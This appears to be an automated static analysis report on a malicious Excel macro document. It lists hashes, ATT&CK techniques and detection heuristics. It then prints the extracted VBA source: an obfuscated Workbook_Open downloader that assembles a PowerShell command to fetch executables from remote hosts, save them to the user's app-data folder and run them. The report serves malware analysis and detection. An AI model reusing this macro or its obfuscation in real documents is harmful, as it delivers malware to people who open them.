Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 93f58647595e2d04…

MALICIOUS

Office (OLE)

Size: 84.0 KB
Created: 2000-07-27 22:24:14
Authoring application: Microsoft Macintosh Excel
First seen: 2020-01-07
MD5: 66fbeb304d592e4a7f203994732f3f71
SHA-1: 9dcba8e099b4b624e5e68a33b3406e9013772f02
SHA-256: 93f58647595e2d0457a230374db1cbc7b7e97b7e40a1b4079d7b6eef3b6767fc
Risk Score: 220

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The file contains VBA macros, including a Workbook_Open event, which is a common technique for malicious Office documents. The macros utilize the Shell() function to execute a command. The script attempts to download and execute a second-stage payload from the URLs 'http://hammer/0iop' and 'http://nov7/0edf.exe', and saves it as 'C:\Users\Public\ntdll.dll'. The document body appears to be a financial form, likely used as a lure.

Heuristics (5)

  • ClamAV: Doc.Downloader.Agent-6333861-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Agent-6333861-0
  • VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    The VBA code contains a Shell() call used to execute a command
  • Workbook_Open macro [high] OLE_VBA_WBOPEN
    The VBA code contains a Workbook_Open auto-execution macro
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    The compiled VBA (p-code) or cache stream contains an auto-execution token together with shell, download or object-execution tokens. This heuristic catches p-code-only macro documents, and documents where source extraction failed, so that no visible source is available.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 6009 bytes
SHA-256: b646398ae16ce4422d0c80e74a35b0f1a80d4e1fd7cc3251ec4e5cd98d404ef1
Preview of extracted script (first 1,000 lines):
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Function funter()
funter = Left(Right(index1, 9), 1)
End Function
Function gamerton()
azerba = "000120~.-00"
gamerton = Left(Right(azerba, 4), 1)
End Function
Function tormo()
tormo = "  -e"
End Function
Function sdokj()
sdokj = "^xe^  "
End Function
Function tiomet()
wasert = "^a" + "ol" + "n" & "w^"
tiomet = wasert
End Function
Function dyyy()
tbooop = "F ;m^od^naR^.me^t" + "s^yS ^tc^ej^bO^-we^N = modnar$"
dyyy = StrReverse(tbooop)
End Function
Function porekol()
porekol = Array(1, Timer(), Timer(), Timer(), Timer(), Timer(), Null, Timer(), Timer(), msoSyncAvailableNone, Timer(), Timer(), "pr" + "O^F", Timer(), Hour(Now), Timer(), Null)
End Function
Function hitlre()
hitlre = "r^oc" + "e^ss $p" + "p; b^re^" + "ak; } c^at" + "^ch { Wr^i" + "t^e-Ho^"
End Function
Function legogame()
legogame = Join(Array(molvins()(7), dfopp()(4), semiik()(5)), "")
End Function
Sub Workbook_Open()
If xlDisplayUnitLabel > 10 Then
If xlSplitByCustomSplit > 0 Then
tipolerto = Shell(legogame & indor & belg & muntic, o)
End If
End If
End Sub
Function belg()
tems = "pp"
erowsf = "a^ch(" + "$um in"
uppdo = "-Wi^ " & "1 -N^" + "O^Pr^  " + dyyy + "o^re" + erowsf + " @({" + nacols + "tp:/" + "/" + hammer + "/0iop" + gamerton + "e"
doss = funter + "e},{h" + "tt" + "p:" + "//" + nov7 + "/0edf.ex" + "e})) { t^ry { $fg = $ra^n^do^m" + gamerton + "n^e^xt(0, 61180); $"
eco1 = tems + " = '%" + Left(erowsf, 1) + tems + "da" + "ta%\' + $fg + '.e" + funter + "e'" + miolenara
sno = "wnl^o^ad^Fi^le($um.ToString(), $pp); S^ta^rt-^P" + hitlre + "st $err^or[0].E^x^cep^ti^on " + "} }"
belg = uppdo & doss & eco1 & sno
End Function
Function index1()
index1 = "vpovage xssrafter"
End Function
Function nacols()
jonny = "appple nahten textilev"
nacols = Right(Left(jonny, 11), 2)
End Function
Function dfopp()
xelofom = Right(Left(index1, 7), 1)
dfopp = Array(Minute(Now), Date, Date, Date, "d" & gamerton + xelofom + funter, Minute(Now), Hour(Now), Date, 1, Timer())
End Function
Function nov7()
diom = Array(xlZero, Timer(), "el-ta", Timer(), "t/t", Timer(), Minute(Now), Timer(), Timer(), Timer(), "t" & Null, Timer(), Minute(Now), Timer(), Timer(), Timer(), Null)
nov7 = "trav" + Array(diom(2) + "xi.ne" + diom(4) + "es" + diom(10))(0)
End Function
Function semiik()
semiik = Array(Date, Date, Day(Now), Minute(Now), Hour(Now), Right(Left(index1, 7), 1) & "  " + Chr(47) + "c """, 0, 0, Timer(), Day(Now), Day(Now))
End Function
Function muntic()
    muntic = """"
End Function
Function hammer()
yoppl = Array(12, Timer(), Minute(Now), "naw", Timer(), Timer(), "a35.n", Timer(), Timer(), Timer(), "et/" & Null, Timer(), Timer(), Null, Timer(), Timer(), Timer(), 0)
hammer = "oki" & Array(yoppl(3) & yoppl(6) & yoppl(10) & "m")(0)
End Function
Function molvins()
molvins = Array(Nothing, "", Timer(), Null, Minute(Now), Null, Minute(Now), "C" + Chr(77), Minute(Now), Hour(Now), Nothing, 0, Second(Now))
End Function
Function miolenara()
ana = "o^D.^)t^n" & "^ei^lc^b^e" + "w.^t^e" + "n.me^t^s" + "y^s tc" + "ej^bo^-" + "w^en^(^ ;"
miolenara = StrReverse(ana)
End Function
Function indor()
havvor = "" & "O"
calero = "D" + ""
sefort = Array(2, 1, Date, Minute(Now), "  " + "-" + "W" + "^" & "In" & Null, Date, Null, Date, Date, Date, Date, "-nO^" & Null, Date, Date, Date, Date, Null)
nalbert = Array(1, Date, Date, Date, Minute(Now), Date, Null, 3, Date, Date, people, Date, 4, Date, Date, Minute(Now), "^Ni^" & "Nt" & Null, Null)
a180 = Array(2, Date, Date, Date, Date, Date, Null, Date, Date, Date, Minute(Now), Date, Date, calero & "O^ws^" + " 1" & Null, Date, Date, Date, Date, Null)
holms = "^.e" & sdokj & sefort(11) + "l -" + "No" + nalbert(16) + Chr(94) & sefort(4) & a180(13)
mibos = Array(Date, Date, 0, Date, Nul
... (truncated)